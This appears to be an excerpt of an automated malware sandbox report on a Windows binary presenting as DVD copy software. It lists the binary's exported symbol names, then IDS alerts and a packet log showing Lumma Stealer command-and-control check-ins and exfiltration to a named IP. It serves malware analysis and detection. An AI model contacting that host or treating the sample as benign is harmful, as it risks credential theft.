@@Burnnerprogressunit@Finalize	45	0x431748
@@Burnnerprogressunit@Initialize	44	0x431738
@@Burnnersettingunit@Finalize	47	0x432a2c
@@Burnnersettingunit@Initialize	46	0x432a1c
@@Burnningprogressunit@Finalize	85	0x44e508
@@Burnningprogressunit@Initialize	84	0x44e4f8
@@Changedischintunit@Finalize	49	0x432fc8
@@Changedischintunit@Initialize	48	0x432fb8
@@Chapterbackupunit@Finalize	51	0x4358f0
@@Chapterbackupunit@Initialize	50	0x4358e0
@@Checkupgradethread@Finalize	7	0x405920
@@Checkupgradethread@Initialize	6	0x405910
@@Checkupgradeunit@Finalize	17	0x4241e8
@@Checkupgradeunit@Initialize	16	0x4241d8
@@Commandlinearguments@Finalize	3987	0x926354
@@Commandlinearguments@Initialize	3986	0x926344
@@Configurefileunit@Finalize	3969	0x8e90f0
@@Configurefileunit@Initialize	3968	0x8e90e0
@@Converteredsizeunit@Finalize	53	0x436d98
@@Converteredsizeunit@Initialize	52	0x436d88
@@Convertprogressunit@Finalize	55	0x438250
@@Convertprogressunit@Initialize	54	0x438240
@@Copychapterprogressunit@Finalize	87	0x44f670
@@Copychapterprogressunit@Initialize	86	0x44f660
@@Copyjobprogressunit@Finalize	89	0x44fd40
@@Copyjobprogressunit@Initialize	88	0x44fd30
@@Copytodvdunit@Finalize	57	0x438270
@@Copytodvdunit@Initialize	56	0x438260
@@Copytompeg2unit@Finalize	59	0x43a3cc
@@Copytompeg2unit@Initialize	58	0x43a3bc
@@Copytompegprogressunit@Finalize	91	0x44fe54
@@Copytompegprogressunit@Initialize	90	0x44fe44
@@Createlistbox@Finalize	9	0x40e9bc
@@Createlistbox@Initialize	8	0x40e9a4
@@Datacenter@Finalize	11	0x4228e4
@@Datacenter@Initialize	10	0x4228d4
@@Debugunit@Finalize	3989	0x926654
@@Debugunit@Initialize	3988	0x926644
@@Dialogbaseunit@Finalize	19	0x4242e4
@@Dialogbaseunit@Initialize	18	0x4242d4
@@Dvd_player_interface@Finalize	3993	0x927154
@@Dvd_player_interface@Initialize	3992	0x927144
@@Dvdbackupfunctionunit@Finalize	33	0x42fe44
@@Dvdbackupfunctionunit@Initialize	32	0x42fe2c
@@Dvdburnerunit@Finalize	61	0x43f358
@@Dvdburnerunit@Initialize	60	0x43f348
@@Dvdconvertinterface@Finalize	3985	0x91e8a4
@@Dvdconvertinterface@Initialize	3984	0x91e894
@@Dvdcreatorunit@Finalize	63	0x43f378
@@Dvdcreatorunit@Initialize	62	0x43f368
@@Dvdtitleconverterinterface@Finalize	3983	0x91dba4
@@Dvdtitleconverterinterface@Initialize	3982	0x91db94
@@Dvdtodvdprogressunit@Finalize	93	0x451688
@@Dvdtodvdprogressunit@Initialize	92	0x451678
@@Dvdtodvdunit@Finalize	65	0x441f98
@@Dvdtodvdunit@Initialize	64	0x441f88
@@Dvdtofolderprogressunit@Finalize	95	0x452174
@@Dvdtofolderprogressunit@Initialize	94	0x452164
@@Dvdtofolderunit@Finalize	67	0x442b08
@@Dvdtofolderunit@Initialize	66	0x442af8
@@Dvdtoisoprogressunit@Finalize	97	0x4527cc
@@Dvdtoisoprogressunit@Initialize	96	0x4527bc
@@Dvdtoisounit@Finalize	69	0x443a14
@@Dvdtoisounit@Initialize	68	0x443a04
@@Exceptionhandling@Finalize	35	0x42fe6c
@@Exceptionhandling@Initialize	34	0x42fe5c
@@Exeversioninfo@Finalize	3981	0x90ad1c
@@Exeversioninfo@Initialize	3980	0x90ad04
@@Extractaudioprogressunit@Finalize	99	0x4528e0
@@Extractaudioprogressunit@Initialize	98	0x4528d0
@@Extractaudiounit@Finalize	71	0x445c78
@@Extractaudiounit@Initialize	70	0x445c68
@@Extractsubtitleunit@Finalize	73	0x445c98
@@Extractsubtitleunit@Initialize	72	0x445c88
@@Extractvideoprogressunit@Finalize	101	0x4529f4
@@Extractvideoprogressunit@Initialize	100	0x4529e4
@@Extractvideounit@Finalize	75	0x447474
@@Extractvideounit@Initialize	74	0x447464
@@Fileoperation@Finalize	3963	0x8ccae0
@@Fileoperation@Initialize	3962	0x8ccad0
@@Fulldvdbackup@Finalize	77	0x4480d4
@@Fulldvdbackup@Initialize	76	0x4480c4
@@Functionunit@Finalize	3961	0x8c9c88
@@Functionunit@Initialize	3960	0x8c9c78
@@Getmovieinfo@Finalize	3977	0x90a3b8
@@Getmovieinfo@Initialize	3976	0x90a3a8
@@Getmovieinfothread@Finalize	3979	0x90a54c
@@Getmovieinfothread@Initialize	3978	0x90a53c
@@Imagemounterunit@Finalize	79	0x4480f4
@@Imagemounterunit@Initialize	78	0x4480e4
@@Inifileunit@Finalize	3971	0x900b74
@@Inifileunit@Initialize	3970	0x900b64
@@Installkb932716@Finalize	21	0x424928
@@Installkb932716@Initialize	20	0x424918
@@Jobprogress@Finalize	103	0x452ae8
@@Jobprogress@Initialize	102	0x452ad8
@@Languagelist@Finalize	3973	0x901bd4
@@Languagelist@Initialize	3972	0x901bc4
@@Lastestversionunit@Finalize	23	0x4257e8
@@Lastestversionunit@Initialize	22	0x4257d8
@@Licenseerror@Finalize	15	0x423eb4
@@Licenseerror@Initialize	14	0x423ea4
@@Loadbluray@Finalize	3967	0x8e3cb8
@@Loadbluray@Initialize	3966	0x8e3ca0
@@Loaddvd@Finalize	3965	0x8e32f0
@@Loaddvd@Initialize	3964	0x8e32e0
@@Mainunit@Finalize	105	0x45c29c
@@Mainunit@Initialize	104	0x45c28c
@@Messagecenter@Finalize	107	0x4605c8
@@Messagecenter@Initialize	106	0x4605b8
@@Multilanguageunit@Finalize	3975	0x903e30
@@Multilanguageunit@Initialize	3974	0x903e20
@@Mybutton@Finalize	122	0x590a24
@@Mybutton@Initialize	121	0x590a14
@@Mychangebutton@Finalize	155	0x591d50
@@Mychangebutton@Initialize	154	0x591d40
@@Mycheckbox@Finalize	172	0x592544
@@Mycheckbox@Initialize	171	0x592534
@@Myclock@Finalize	194	0x593200
@@Myclock@Initialize	193	0x5931f0
@@Mycustombutton@Finalize	196	0x593b04
@@Mycustombutton@Initialize	195	0x593af4
@@Mycustomscrollbar@Finalize	198	0x593b24
@@Mycustomscrollbar@Initialize	197	0x593b14
@@Mycustomtrackbar@Finalize	200	0x594414
@@Mycustomtrackbar@Initialize	199	0x594404
@@Mydropdownbutton@Finalize	227	0x59a184
@@Mydropdownbutton@Initialize	226	0x59a174
@@Mydvdlistbox@Finalize	269	0x59e2fc
@@Mydvdlistbox@Initialize	268	0x59e2ec
@@Myframelist@Finalize	294	0x5a11d4
@@Myframelist@Initialize	293	0x5a11c4
@@Myiconlist@Finalize	314	0x5a3af0
@@Myiconlist@Initialize	313	0x5a3ae0
@@Mylistview@Finalize	377	0x5ae274
@@Mylistview@Initialize	376	0x5ae264
@@Mynoticeboard@Finalize	397	0x5aee98
@@Mynoticeboard@Initialize	396	0x5aee88
@@Myplayerevent@Finalize	3991	0x926914
@@Myplayerevent@Initialize	3990	0x926904
@@Myplayerprogress@Finalize	418	0x5afa34
@@Myplayerprogress@Initialize	417	0x5afa24
@@Myprogressbar@Finalize	432	0x5b0134
@@Myprogressbar@Initialize	431	0x5b0124
@@Mytrackbar@Finalize	437	0x5b046c
@@Mytrackbar@Initialize	436	0x5b045c
@@Myvariablepanel@Finalize	453	0x5b0fac
@@Myvariablepanel@Initialize	452	0x5b0f9c
@@Myvideocapture@Finalize	485	0x5b28d0
@@Myvideocapture@Initialize	484	0x5b28c0
@@Myvolumebar@Finalize	496	0x5b2ce8
@@Myvolumebar@Initialize	495	0x5b2cd8
@@Pngunit@Finalize	3	0x403314
@@Pngunit@Initialize	2	0x403304
@@Progressunit@Finalize	25	0x425a24
@@Progressunit@Initialize	24	0x425a14
@@Publicunit@Finalize	498	0x5b2da0
@@Publicunit@Initialize	497	0x5b2d90
@@Registchangemessage@Finalize	109	0x4609a8
@@Registchangemessage@Initialize	108	0x460998
@@Registdialogunit@Finalize	27	0x42770c
@@Registdialogunit@Initialize	26	0x4276fc
@@Selectedvdunit@Finalize	81	0x449864
@@Selectedvdunit@Initialize	80	0x449854
@@Showregisterunit@Finalize	29	0x428c10
@@Showregisterunit@Initialize	28	0x428c00
@@Systemunit@Finalize	111	0x460edc
@@Systemunit@Initialize	110	0x460ecc
@@Taesencoder@Finalize	3955	0x8a370c
@@Taesencoder@Initialize	3954	0x8a36fc
@@Toolisomounterunit@Finalize	83	0x44d9a8
@@Toolisomounterunit@Initialize	82	0x44d998
@@Trsaencoder@Finalize	3957	0x8c802c
@@Trsaencoder@Initialize	3956	0x8c801c
@@Upgradeversionunit@Finalize	31	0x4296a4
@@Upgradeversionunit@Initialize	30	0x429694
@@Usermessageunit@Finalize	113	0x46189c
@@Usermessageunit@Initialize	112	0x46188c
@@Utf8inifile@Finalize	115	0x46595c
@@Utf8inifile@Initialize	114	0x465944
@@Variableunit@Finalize	5	0x4037fc
@@Variableunit@Initialize	4	0x4037ec
@@Verify@Finalize	3959	0x8c8b04
@@Verify@Initialize	3958	0x8c8af4
@Acalphaimagelist@AddImageFromRes$qqruip33Acalphaimagelist@TsAlphaImageListx20System@UnicodeString30Acalphaimagelist@TsImageFormat	3589	0x6a2e4c
@Acalphaimagelist@DrawAlphaImgList$qqrpx24Imglist@TCustomImageListpx16Graphics@TBitmapxixixixix15Graphics@TColorixixo	3586	0x6a2ae8
@Acalphaimagelist@DrawAlphaImgListDC$qqrpx24Imglist@TCustomImageListxp5HDC__xixixixix15Graphics@TColorxixixo	3587	0x6a2cac
@Acalphaimagelist@Finalization$qqrv	3625	0x6a422c
@Acalphaimagelist@GetImageFormat$qqrx20System@UnicodeStringr30Acalphaimagelist@TsImageFormat	3585	0x6a2a1c
@Acalphaimagelist@HaveMagic$qqrx20System@UnicodeStringpxvxi	3588	0x6a2d7c
@Acalphaimagelist@TsAlphaImageList@	3583	0x6a257c
@Acalphaimagelist@TsAlphaImageList@$bctr$qqrp18Classes@TComponent	3594	0x6a3264
@Acalphaimagelist@TsAlphaImageList@$bdtr$qqrv	3596	0x6a32e0
@Acalphaimagelist@TsAlphaImageList@AcBeginUpdate$qqrv	3611	0x6a4040
@Acalphaimagelist@TsAlphaImageList@AcEndUpdate$qqro	3612	0x6a4048
@Acalphaimagelist@TsAlphaImageList@AfterConstruction$qqrv	3590	0x6a2f44
@Acalphaimagelist@TsAlphaImageList@Assign$qqrp19Classes@TPersistent	3591	0x6a2f98
@Acalphaimagelist@TsAlphaImageList@AssignTo$qqrp19Classes@TPersistent	3592	0x6a3074
@Acalphaimagelist@TsAlphaImageList@Change$qqrv	3610	0x6a3dec
@Acalphaimagelist@TsAlphaImageList@CopyImages$qqrpx33Acalphaimagelist@TsAlphaImageList	3593	0x6a3144
@Acalphaimagelist@TsAlphaImageList@CreateImgList$qqrv	3595	0x6a32b4
@Acalphaimagelist@TsAlphaImageList@DoDraw$qqrip16Graphics@TCanvasiiuio	3597	0x6a3310
@Acalphaimagelist@TsAlphaImageList@GenerateStdList$qqrv	3598	0x6a34b8
@Acalphaimagelist@TsAlphaImageList@GetBitmap32$qqrip16Graphics@TBitmap	3599	0x6a379c
@Acalphaimagelist@TsAlphaImageList@IsDuplicated$qqrv	3600	0x6a39b8
@Acalphaimagelist@TsAlphaImageList@ItemsClear$qqrv	3609	0x6a3db4
@Acalphaimagelist@TsAlphaImageList@KillImgList$qqrv	3601	0x6a39d0
@Acalphaimagelist@TsAlphaImageList@LoadFromFile$qqrx20System@UnicodeString	3603	0x6a3a44
@Acalphaimagelist@TsAlphaImageList@Loaded$qqrv	3602	0x6a3a0c
@Acalphaimagelist@TsAlphaImageList@ReadData$qqrp15Classes@TStream	3604	0x6a3b50
@Acalphaimagelist@TsAlphaImageList@SetItems$qqrpx31Acalphaimagelist@TsImgListItems	3606	0x6a3b58
@Acalphaimagelist@TsAlphaImageList@SetNewDimensions$qqrui	3607	0x6a3b68
@Acalphaimagelist@TsAlphaImageList@TryLoadFromFile$qqrx20System@UnicodeString	3608	0x6a3ba0
@Acalphaimagelist@TsAlphaImageList@WriteData$qqrp15Classes@TStream	3605	0x6a3b54
@Acalphaimagelist@TsImgListItem@	3579	0x6a21bc
@Acalphaimagelist@TsImgListItem@$bctr$qqrp19Classes@TCollection	3620	0x6a4148
@Acalphaimagelist@TsImgListItem@$bdtr$qqrv	3622	0x6a41e4
@Acalphaimagelist@TsImgListItem@Assign$qqrp19Classes@TPersistent	3618	0x6a40f0
@Acalphaimagelist@TsImgListItem@AssignTo$qqrp19Classes@TPersistent	3619	0x6a411c
@Acalphaimagelist@TsImgListItem@DefineProperties$qqrp14Classes@TFiler	3621	0x6a419c
@Acalphaimagelist@TsImgListItem@ReadData$qqrp15Classes@TStream	3623	0x6a4214
@Acalphaimagelist@TsImgListItem@WriteData$qqrp15Classes@TStream	3624	0x6a4220
@Acalphaimagelist@TsImgListItems@	3581	0x6a2420
@Acalphaimagelist@TsImgListItems@$bctr$qqrp33Acalphaimagelist@TsAlphaImageList	3613	0x6a4060
@Acalphaimagelist@TsImgListItems@$bdtr$qqrv	3614	0x6a40a4
@Acalphaimagelist@TsImgListItems@GetItem$qqri	3615	0x6a40d0
@Acalphaimagelist@TsImgListItems@GetOwner$qqrv	3616	0x6a40e4
@Acalphaimagelist@TsImgListItems@SetItem$qqrip30Acalphaimagelist@TsImgListItem	3617	0x6a40e8
@Acalphaimagelist@initialization$qqrv	3626	0x6a4234
@Acdials@AddSupportedForm$qqruip16tagCREATESTRUCTW	2984	0x66d4c8
@Acdials@BroadCastHwnd$qqrxp6HWND__rx17Messages@TMessage	2980	0x66d16c
@Acdials@CleanArray$qqrv	3071	0x673f6c
@Acdials@ClearMnuArray$qqrv	3070	0x673f14
@Acdials@ControlExists$qqrp6HWND__x20System@UnicodeString	2982	0x66d1fc
@Acdials@DlgLeft	4064	0x956b40
@Acdials@DlgTop	4065	0x956b44
@Acdials@DrawAppIcon$qqrp20Acdials@TacDialogWnd	2997	0x66e7d4
@Acdials@FillArOR$qqrp20Acdials@TacDialogWnd	2999	0x66e9d8
@Acdials@Finalization$qqrv	3072	0x673fdc
@Acdials@FindFormInList$qqrui	2986	0x66d844
@Acdials@FindFormOnScreen$qqrui	2987	0x66d880
@Acdials@GetRgnFromArOR$qqrp20Acdials@TacDialogWndii	3001	0x66ec20
@Acdials@GetWndClassName$qqrui	2985	0x66d818
@Acdials@GetWndText$qqrui	2998	0x66e910
@Acdials@HookCallback	4226	0x9c9ad4
@Acdials@InitDialog$qqruirp20Acdials@TacDialogWnd	2996	0x66e720
@Acdials@MnuArray	4231	0x9c9af4
@Acdials@SkinHookCBT$qqsiii	2983	0x66d294
@Acdials@TacDialogWnd@	2975	0x66bf44
@Acdials@TacDialogWnd@$bctr$qqrp6HWND__p24Scommondata@TsCommonDatap26Sskinmanager@TsSkinManagerx20System@UnicodeStringo	3005	0x66fca8
@Acdials@TacDialogWnd@$bdtr$qqrv	3006	0x66fdb0
@Acdials@TacDialogWnd@AboveBorder$qqrrx21Messages@TWMNCHitTest	3040	0x672c64
@Acdials@TacDialogWnd@Ac_DrawStaticItem$qqrr20Messages@TWMDrawItem	3048	0x6737f0
@Acdials@TacDialogWnd@Ac_WMActivate$qqrr17Messages@TMessage	3047	0x6737c0
@Acdials@TacDialogWnd@Ac_WMLButtonUp$qqrr17Messages@TMessage	3045	0x673574
@Acdials@TacDialogWnd@Ac_WMNCActivate$qqrr17Messages@TMessage	3046	0x6737a4
@Acdials@TacDialogWnd@Ac_WMNCHitTest$qqrr17Messages@TMessage	3036	0x6726a0
@Acdials@TacDialogWnd@Ac_WMNCLButtonDown$qqrr24Messages@TWMNCHitMessage	3042	0x673340
@Acdials@TacDialogWnd@Ac_WMNCPaint$qqrr17Messages@TMessage	3028	0x671e70
@Acdials@TacDialogWnd@Ac_WMPaint$qqrr17Messages@TWMPaint	3007	0x66fe5c
@Acdials@TacDialogWnd@AdapterRemove$qqrv	3033	0x6725fc
@Acdials@TacDialogWnd@BarWidth$qqri	3003	0x66fbbc
@Acdials@TacDialogWnd@BorderHeight$qqrv	3030	0x672110
@Acdials@TacDialogWnd@ButtonHeight$qqri	3032	0x672588
@Acdials@TacDialogWnd@CaptionHeight$qqro	3004	0x66fc38
@Acdials@TacDialogWnd@CursorToPoint$qqrii	3039	0x672c1c
@Acdials@TacDialogWnd@DropSysMenu$qqrii	3044	0x673548
@Acdials@TacDialogWnd@EnabledClose$qqrv	3008	0x66ff10
@Acdials@TacDialogWnd@EnabledMax$qqrv	3009	0x66ff40
@Acdials@TacDialogWnd@EnabledMin$qqrv	3010	0x66ff78
@Acdials@TacDialogWnd@EnabledRestore$qqrv	3011	0x66ff9c
@Acdials@TacDialogWnd@FormActive$qqrv	3012	0x66ffcc
@Acdials@TacDialogWnd@HTProcess$qqrr21Messages@TWMNCHitTest	3037	0x6727dc
@Acdials@TacDialogWnd@HeaderHeight$qqrv	3013	0x66ffd4
@Acdials@TacDialogWnd@IconRect$qqrv	3050	0x67389c
@Acdials@TacDialogWnd@InitExBorders$qqrxo	3049	0x673800
@Acdials@TacDialogWnd@InitParams$qqrv	3014	0x66fffc
@Acdials@TacDialogWnd@KillAnimations$qqrv	3052	0x6739c4
@Acdials@TacDialogWnd@MakeTitleBG$qqrv	3015	0x670128
@Acdials@TacDialogWnd@OffsetX$qqrv	3016	0x6701f0
@Acdials@TacDialogWnd@OffsetY$qqrv	3017	0x67023c
@Acdials@TacDialogWnd@PaintAll$qqrv	3018	0x670938
@Acdials@TacDialogWnd@PaintBorderIcons$qqrv	3019	0x67170c
@Acdials@TacDialogWnd@PaintCaption$qqrxp5HDC__	3029	0x671f68
@Acdials@TacDialogWnd@PaintForm$qqrrp5HDC__o	3020	0x671b70
@Acdials@TacDialogWnd@PrepareTitleGlyph$qqrv	3021	0x671c04
@Acdials@TacDialogWnd@RepaintButton$qqri	3041	0x672ce4
@Acdials@TacDialogWnd@SendToAdapter$qqrrx17Messages@TMessage	3034	0x672648
@Acdials@TacDialogWnd@SetHotHT$qqrio	3038	0x672b54
@Acdials@TacDialogWnd@SetPressedHT$qqri	3043	0x67346c
@Acdials@TacDialogWnd@ShadowSize$qqrv	3051	0x67398c
@Acdials@TacDialogWnd@SysButtonWidth$qqrrx29Sskinprovider@TsCaptionButton	3022	0x671d00
@Acdials@TacDialogWnd@TitleBtnsWidth$qqrv	3023	0x671dac
@Acdials@TacDialogWnd@UpdateIconsIndexes$qqrv	3031	0x672124
@Acdials@TacDialogWnd@VisibleClose$qqrv	3024	0x671e20
@Acdials@TacDialogWnd@VisibleHelp$qqrv	3025	0x671e34
@Acdials@TacDialogWnd@VisibleMax$qqrv	3026	0x671e48
@Acdials@TacDialogWnd@VisibleMin$qqrv	3027	0x671e5c
@Acdials@TacDialogWnd@VisibleRestore$qqrv	3035	0x672674
@Acdials@TacDialogWnd@acWndProc$qqrr17Messages@TMessage	3002	0x66ee40
@Acdials@TacProvider@	2977	0x66ce44
@Acdials@TacProvider@$bctr$qqrp18Classes@TComponent	2989	0x66e35c
@Acdials@TacProvider@$bdtr$qqrv	2990	0x66e398
@Acdials@TacProvider@AddControl$qqrp6HWND__	2988	0x66d91c
@Acdials@TacProvider@FindCtrlInList$qqrui	2991	0x66e448
@Acdials@TacProvider@InitForm$qqrp17Forms@TCustomForm	2992	0x66e490
@Acdials@TacProvider@InitHwndControls$qqrp6HWND__	2993	0x66e4cc
@Acdials@TacProvider@InitSkin$qqrp6HWND__	2994	0x66e52c
@Acdials@TacProvider@PrintHwndControls$qqrp6HWND__p5HDC__	2995	0x66e650
@Acdials@TacSystemMenu@	2973	0x66b9ec
@Acdials@TacSystemMenu@$bctr$qqrp18Classes@TComponent	3054	0x673a84
@Acdials@TacSystemMenu@CloseClick$qqrp14System@TObject	3053	0x673a1c
@Acdials@TacSystemMenu@EnabledMax$qqrv	3055	0x673cd0
@Acdials@TacSystemMenu@EnabledMin$qqrv	3056	0x673cd4
@Acdials@TacSystemMenu@EnabledMove$qqrv	3057	0x673cd8
@Acdials@TacSystemMenu@EnabledRestore$qqrv	3058	0x673cf4
@Acdials@TacSystemMenu@EnabledSize$qqrv	3059	0x673cf8
@Acdials@TacSystemMenu@MaxClick$qqrp14System@TObject	3060	0x673d24
@Acdials@TacSystemMenu@MinClick$qqrp14System@TObject	3061	0x673d4c
@Acdials@TacSystemMenu@MoveClick$qqrp14System@TObject	3062	0x673d68
@Acdials@TacSystemMenu@RestoreClick$qqrp14System@TObject	3063	0x673d84
@Acdials@TacSystemMenu@SizeClick$qqrp14System@TObject	3064	0x673dac
@Acdials@TacSystemMenu@UpdateItems$qqrv	3065	0x673dc8
@Acdials@TacSystemMenu@VisibleClose$qqrv	3066	0x673ecc
@Acdials@TacSystemMenu@VisibleMax$qqrv	3067	0x673ee8
@Acdials@TacSystemMenu@VisibleMin$qqrv	3068	0x673eec
@Acdials@TacSystemMenu@VisibleSize$qqrv	3069	0x673ef0
@Acdials@UpdateRgn$qqrp20Acdials@TacDialogWndo	3000	0x66eb50
@Acdials@VisibleDlgCount$qqrv	2981	0x66d1b0
@Acdials@WndCallBack	4227	0x9c9ad8
@Acdials@WndCallRet	4228	0x9c9adc
@Acdials@acSupportedList	4229	0x9c9ae0
@Acdials@fRect	4230	0x9c9ae4
@Acdials@initialization$qqrv	3073	0x674058
@Acglow@ClearGlows$qqrv	2938	0x669a48
@Acglow@FBlend	4220	0x9c9ab0
@Acglow@Finalization$qqrv	2945	0x669f84
@Acglow@HideGlow$qqrxi	2937	0x669a0c
@Acglow@ShowGlow$qqrrx11Types@TRectt1x20System@UnicodeStringt3xixip6HWND__p26Sskinmanager@TsSkinManager	2936	0x6698e8
@Acglow@TacGlowEffect@	2933	0x669658
@Acglow@TacGlowEffect@$bctr$qqrv	2939	0x669a90
@Acglow@TacGlowEffect@$bdtr$qqrv	2941	0x669b50
@Acglow@TacGlowEffect@CreateAlphaBmp$qqrxixi	2940	0x669ab8
@Acglow@TacGlowEffect@IntBorderWidth$qqrv	2942	0x669ba8
@Acglow@TacGlowEffect@NewWndProc$qqrr17Messages@TMessage	2943	0x669bb0
@Acglow@TacGlowEffect@Show$qqrrx11Types@TRectt1xip6HWND__	2944	0x669bd0
@Acglow@acgEffects	4221	0x9c9ab4
@Acglow@initialization$qqrv	2946	0x669fcc

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States
Russian	Russia

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-18T18:29:36.301287+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49738	104.21.88.199	443	TCP
2024-12-18T18:29:39.998247+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49738	104.21.88.199	443	TCP
2024-12-18T18:29:39.998247+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49738	104.21.88.199	443	TCP
2024-12-18T18:29:41.250680+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49749	104.21.88.199	443	TCP
2024-12-18T18:29:45.620212+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.7	49749	104.21.88.199	443	TCP
2024-12-18T18:29:45.620212+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49749	104.21.88.199	443	TCP
2024-12-18T18:29:47.238820+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49764	104.21.88.199	443	TCP
2024-12-18T18:29:50.238595+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49769	104.21.88.199	443	TCP
2024-12-18T18:29:57.255718+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49784	104.21.88.199	443	TCP
2024-12-18T18:30:03.299619+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49795	104.21.88.199	443	TCP
2024-12-18T18:30:09.409773+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49805	104.21.88.199	443	TCP
2024-12-18T18:30:13.913664+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.7	49805	104.21.88.199	443	TCP
2024-12-18T18:30:14.346117+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49819	104.21.88.199	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 18:29:34.882766008 CET	49738	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:34.882816076 CET	443	49738	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:34.882889986 CET	49738	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:34.933284998 CET	49738	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:34.933314085 CET	443	49738	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:36.301208973 CET	443	49738	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:36.301286936 CET	49738	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:36.304568052 CET	49738	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:36.304579020 CET	443	49738	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:36.304822922 CET	443	49738	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:36.392420053 CET	49738	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:36.401725054 CET	49738	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:36.401753902 CET	49738	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:36.401842117 CET	443	49738	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:39.998250961 CET	443	49738	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:39.998331070 CET	443	49738	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:39.998522043 CET	49738	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:40.000435114 CET	49738	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:40.000478983 CET	443	49738	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:40.008415937 CET	49749	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:40.008439064 CET	443	49749	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:40.008519888 CET	49749	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:40.008795023 CET	49749	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:40.008805990 CET	443	49749	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:41.250592947 CET	443	49749	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:41.250679970 CET	49749	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:41.276011944 CET	49749	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:41.276027918 CET	443	49749	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:41.276308060 CET	443	49749	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:41.329917908 CET	49749	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:41.481429100 CET	49749	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:41.481501102 CET	49749	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:41.481533051 CET	443	49749	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:45.620254040 CET	443	49749	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:45.620419979 CET	443	49749	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:45.620517969 CET	443	49749	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:45.620599985 CET	443	49749	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:45.620615005 CET	49749	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:45.620651007 CET	443	49749	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:45.620661974 CET	49749	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:45.620755911 CET	443	49749	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:45.620856047 CET	443	49749	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:45.620889902 CET	49749	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:45.620897055 CET	443	49749	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:45.620959997 CET	49749	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:45.628403902 CET	443	49749	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:45.639709949 CET	443	49749	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:45.639765024 CET	443	49749	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:45.639821053 CET	49749	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:45.639847994 CET	443	49749	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:45.639930964 CET	49749	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:45.739423990 CET	443	49749	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:45.739550114 CET	443	49749	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:45.739615917 CET	49749	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:45.739727020 CET	49749	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:45.739738941 CET	443	49749	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:45.739749908 CET	49749	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:45.739756107 CET	443	49749	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:45.948288918 CET	49764	443	192.168.2.7	104.21.88.199
